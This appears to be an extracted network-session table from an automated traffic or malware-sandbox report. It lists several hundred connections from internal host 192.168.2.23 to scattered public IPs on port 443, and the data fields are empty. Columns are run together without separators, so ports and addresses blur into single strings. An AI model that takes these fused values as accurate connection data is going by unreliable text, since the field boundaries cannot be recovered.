                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20343192.168.2.2342188206.151.202.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20344192.168.2.235066285.136.8.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20345192.168.2.235651820.32.166.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20346192.168.2.234893687.175.179.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20347192.168.2.234899469.83.86.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20348192.168.2.234141859.174.101.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20349192.168.2.2332834111.189.172.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20350192.168.2.235684038.172.203.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20351192.168.2.2340764102.165.72.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20352192.168.2.233671841.43.134.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20353192.168.2.2336696137.119.51.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20354192.168.2.234593873.126.80.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20355192.168.2.2338816118.58.178.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20356192.168.2.2359552193.77.200.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20357192.168.2.2360478141.4.0.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20358192.168.2.2357528119.168.167.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20359192.168.2.2355240205.186.115.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20360192.168.2.233931065.35.218.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20361192.168.2.2359396114.197.7.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20362192.168.2.235687846.30.53.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20363192.168.2.234044057.38.156.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20364192.168.2.2356310171.118.11.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20365192.168.2.233879418.175.132.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20366192.168.2.2359250130.110.174.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20367192.168.2.2359464152.59.18.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20368192.168.2.2350202105.49.19.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20369192.168.2.233566250.185.225.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20370192.168.2.2340368196.219.222.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20371192.168.2.233492698.66.222.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20372192.168.2.2342638183.192.198.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20373192.168.2.2345270118.122.83.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20374192.168.2.234578423.64.174.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20375192.168.2.2347320126.210.13.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20376192.168.2.235561273.101.46.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20377192.168.2.234039479.37.144.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20378192.168.2.2353510222.214.11.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20379192.168.2.2336164115.130.23.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20380192.168.2.2345546199.88.28.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20381192.168.2.2358728219.120.242.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20382192.168.2.235916837.145.98.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20383192.168.2.2337286216.12.151.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20384192.168.2.235561289.87.2.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20385192.168.2.2349756201.158.57.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20386192.168.2.2355596221.49.235.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20387192.168.2.233448878.111.128.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20388192.168.2.2341008186.182.4.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20389192.168.2.2343582118.156.254.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20390192.168.2.2344980109.241.76.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20391192.168.2.234586647.171.183.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20392192.168.2.2349132201.92.89.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20393192.168.2.235561067.219.162.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20394192.168.2.2350330147.118.14.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20395192.168.2.234125812.184.125.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20396192.168.2.2351512152.213.46.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20397192.168.2.234571684.254.185.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20398192.168.2.2358408166.69.76.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20399192.168.2.2348350101.240.239.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20400192.168.2.23388648.194.139.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20401192.168.2.235991048.196.21.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20402192.168.2.2357272167.194.28.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20403192.168.2.2342470189.83.155.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20404192.168.2.233396692.48.195.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20405192.168.2.2332778168.57.2.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20406192.168.2.2360784161.155.25.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20407192.168.2.23343802.213.69.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20408192.168.2.2349504196.116.116.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20409192.168.2.2349136222.194.215.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20410192.168.2.2353564180.145.36.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20411192.168.2.235361031.205.25.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20412192.168.2.2359234106.6.219.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20413192.168.2.2340468121.29.70.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20414192.168.2.2355590150.34.133.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20415192.168.2.2337712132.237.251.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20416192.168.2.2341954151.242.220.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20417192.168.2.2333688183.0.44.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20418192.168.2.2360010203.194.20.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20419192.168.2.235155219.128.23.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20420192.168.2.235757662.83.173.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20421192.168.2.235098469.193.180.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20422192.168.2.2359802101.125.188.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20423192.168.2.235990859.208.3.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20424192.168.2.234036092.125.182.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20425192.168.2.2348912181.99.147.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20426192.168.2.2354386160.49.230.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20427192.168.2.2346048110.86.200.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20428192.168.2.2343120101.247.161.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20429192.168.2.2354274192.253.58.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20430192.168.2.2355518188.64.246.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20431192.168.2.2339494196.130.67.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20432192.168.2.2353218175.125.83.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20433192.168.2.2359220102.51.164.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20434192.168.2.2359452108.28.63.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20435192.168.2.2343348160.37.109.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20436192.168.2.234406495.221.135.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20437192.168.2.2350720203.211.175.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20438192.168.2.2354866200.248.76.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20439192.168.2.235977219.52.82.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20440192.168.2.234107636.241.193.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20441192.168.2.2356014133.142.65.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20442192.168.2.2339676193.36.144.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20443192.168.2.233594471.237.217.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20444192.168.2.235342490.212.30.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20445192.168.2.234627654.175.13.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20446192.168.2.234884293.76.60.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20447192.168.2.234661083.127.255.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20448192.168.2.2340272158.20.91.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20449192.168.2.2342716194.101.109.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20450192.168.2.23388188.212.244.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20451192.168.2.2347618155.141.18.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20452192.168.2.2335974106.17.51.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20453192.168.2.234677431.185.0.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20454192.168.2.2349592157.86.81.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20455192.168.2.235782041.196.234.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20456192.168.2.2359460173.187.205.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20457192.168.2.23566422.139.175.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20458192.168.2.2349952206.145.140.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20459192.168.2.2360358112.78.236.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20460192.168.2.2339110222.138.197.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20461192.168.2.235009627.41.87.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20462192.168.2.2347782125.167.233.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20463192.168.2.2359592102.35.71.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20464192.168.2.234485213.75.20.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20465192.168.2.234355447.149.187.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20466192.168.2.2349194115.50.193.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20467192.168.2.2343788158.247.43.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20468192.168.2.2355332120.123.216.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20469192.168.2.2343272195.24.141.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20470192.168.2.2348086211.28.145.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20471192.168.2.2354970191.138.62.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20472192.168.2.2350782200.35.45.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20473192.168.2.234648823.34.35.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20474192.168.2.2358766140.188.69.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20475192.168.2.2342210166.248.15.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20476192.168.2.23536788.118.19.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20477192.168.2.2342146191.127.9.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20478192.168.2.234240449.44.30.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20479192.168.2.234154266.196.140.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20480192.168.2.235253636.108.154.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20481192.168.2.234165445.155.186.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20482192.168.2.2338024120.75.130.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20483192.168.2.235631841.17.229.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20484192.168.2.234978436.157.85.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20485192.168.2.2346630117.66.51.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20486192.168.2.2352284187.230.77.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20487192.168.2.2354838157.183.68.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20488192.168.2.2353556103.211.181.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20489192.168.2.234265282.58.151.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20490192.168.2.2343782120.197.155.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20491192.168.2.2354252181.117.142.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20492192.168.2.2334272196.95.77.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20493192.168.2.233874024.60.58.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20494192.168.2.235469662.230.73.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20495192.168.2.2337426129.7.226.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20496192.168.2.233512690.36.144.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20497192.168.2.2349790119.50.4.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20498192.168.2.233385217.125.249.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20499192.168.2.235863017.137.2.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20500192.168.2.235551652.174.150.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20501192.168.2.2334590222.149.58.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20502192.168.2.233501878.148.51.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20503192.168.2.2352056158.191.103.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20504192.168.2.2336884161.69.54.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20505192.168.2.235918268.190.39.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20506192.168.2.2356072141.42.83.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20507192.168.2.2340348203.200.40.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20508192.168.2.235211299.202.89.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20509192.168.2.234611082.221.4.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20510192.168.2.2340474207.63.24.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20511192.168.2.234688823.0.150.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20512192.168.2.235604632.0.228.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20513192.168.2.2346020155.199.49.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20514192.168.2.2357474213.183.67.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20515192.168.2.2334590195.149.94.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20516192.168.2.2348256200.139.156.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20517192.168.2.2343350158.214.149.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20518192.168.2.234795050.6.15.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20519192.168.2.2360174166.178.132.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20520192.168.2.234073257.170.171.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20521192.168.2.2355632142.82.160.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20522192.168.2.23431909.126.81.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20523192.168.2.2348840166.16.43.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20524192.168.2.235444445.166.130.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20525192.168.2.233375079.138.77.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20526192.168.2.2356754108.150.180.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20527192.168.2.234902252.74.137.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20528192.168.2.2347712158.120.52.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20529192.168.2.2337900108.212.128.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20530192.168.2.236099841.189.229.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20531192.168.2.2343716120.195.83.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20532192.168.2.236079019.49.239.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20533192.168.2.2344574100.37.141.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20534192.168.2.2357996158.37.253.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20535192.168.2.2353870198.237.224.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20536192.168.2.2353952165.31.202.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20537192.168.2.2335532207.176.85.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20538192.168.2.2347038152.206.107.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20539192.168.2.234028473.229.186.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20540192.168.2.2338418114.220.206.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20541192.168.2.235675639.67.26.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20542192.168.2.2350596133.110.230.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20543192.168.2.233975483.148.201.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20544192.168.2.2356706108.28.140.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20545192.168.2.2342464176.216.129.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20546192.168.2.2350704193.205.243.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20547192.168.2.2352530182.75.116.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20548192.168.2.234134218.106.79.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20549192.168.2.2355896151.0.249.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20550192.168.2.234635444.38.205.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20551192.168.2.2337760112.130.243.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20552192.168.2.233800079.47.51.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20553192.168.2.2336830181.74.194.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20554192.168.2.2340494179.86.56.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20555192.168.2.234580631.96.214.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20556192.168.2.236012435.90.136.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20557192.168.2.23386124.154.119.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20558192.168.2.2341344188.16.77.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20559192.168.2.2346416120.147.83.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20560192.168.2.23421768.78.238.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20561192.168.2.235615624.98.43.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20562192.168.2.2333030111.41.214.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            20563192.168.2.2359072178.133.31.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
